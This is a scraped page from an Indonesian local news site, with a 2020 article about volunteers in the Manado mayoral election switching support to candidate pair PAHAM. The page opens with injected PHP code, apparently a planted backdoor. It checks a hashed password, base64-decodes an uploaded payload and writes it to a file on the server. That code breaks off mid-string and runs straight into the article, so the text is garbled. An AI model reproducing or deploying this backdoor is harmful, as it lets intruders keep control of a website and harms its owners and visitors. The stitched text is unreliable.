function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Srikandi SSK Camar Buha Sebut Program PAHAM Paling Nyaman - IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 26 Nov 2020 10:47 WIB ·

Srikandi SSK Camar Buha Sebut Program PAHAM Paling Nyaman


					Srikandi SSK Camar Buha Sebut Program PAHAM Paling Nyaman Perbesar

MANADO – Program pembangunan melalui visi dan misi yang telah dipaparkan pasangan calon nomor urut 4 PAULA-HARLEY MENANG (PAHAM) ke masyarakat melalui sosialisasi turun ke masyarakat dan terakhir dijabarkan di Debat Kandidat yang digelar KPU Manado, ternyata berdampak besar bagi masyarakat Kota Manado.

Lihat saja, relawan, simpatisan dan pendukung militan dari pasangan calon lain justru beriringan antri berbalik arah bergabung bersama PAHAM . Penegasanya, Rabu (25/11/2020) pendukung paslon SONYA SELVIANA KEMBUAN calon walikota dan SYARIFUDIN SAAFA calon wakil walikota (SSK-SS) menyatakan diri bergabung dengan PAHAM. Mereka adalah relawan Srikandi SSK Camar Buha.

Dalam pertemuan dengan calon Wakil Walikota Manado (PAHAM) DR Harley Mangindaan dirumah kediaman salah satu relawan Srikandi SSK Camat Buha, mereka menjelaskan alasan kenapa sampai pindah dan bergabung dengan PAHAM.

“Cuma dalam program yang kita lia, yang paling nyaman di hati cuma nomor 4 PAHAM. Makanyan kami (Srikandi SSK) dari sebelah pindah ke nomor 4. ITU JO,” tegas serentak puluhan Srikandi SSK yang dibawah komando Ibu Setiani.
Pada kesempatan tersebut, DR Harley Mangindaan sempat menyentil agar PAHAM caranya mencoblos nanti di tanggal 9 Desember 2020.

“Jangan karena masih terbawa di paslon lalu, sampe lupa bagaiman cara mencoblos di nomor 4. Jangan ba bayang otak dimana, badan dimana, tangan dimana, kage terekam tu yang itu (paslon lain) karena salah perkiraan,” canda Ai Mangindaan yang dikenal merakyat itu.

“Tapi saya yakin dan sangat yakin, ibu-ibu, saudara -saudara sudah PAHAM,” sambung Doktor jebolan UNHAS ini.
Tidak lupa atas nama Ibu Paula calon Walikota nomor urut 4, dan seluruh pendukung, relawan dan simpatisan PAHAM menghaturkan terima kasih atas bergabungnya Srikandi SSK.

“Dengan memanjatkan syukur memanjatkan doa kepada Allah SWT, saya Harley Mangindaan mewakili ibu Paula calon walikota manado nomor urut 4 secara resmi menerima bergabungnya teman teman yang sudah bergabung sebelumnya ke pasangan lain masuk ke bergabung ke paham. Dengan rendah hati dan niat yang tulus kami menerinnya. Semangat dan terus semangat, inilah satu sejarah dan bukan untuk mengecilkan paslon lain karena programnya tapi karena saudara-saudara menganggap ini adaLah ridho Allah SWT kita bisa bersama-sama seperjuangan untuk memenangkan nomor 4, PAHAM ..ITU JO ,” serentak dikatakan para pendukung Sikandi SSK yang dipandu Ai Mangindaan. (redaksi)

Artikel ini telah dibaca 1 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized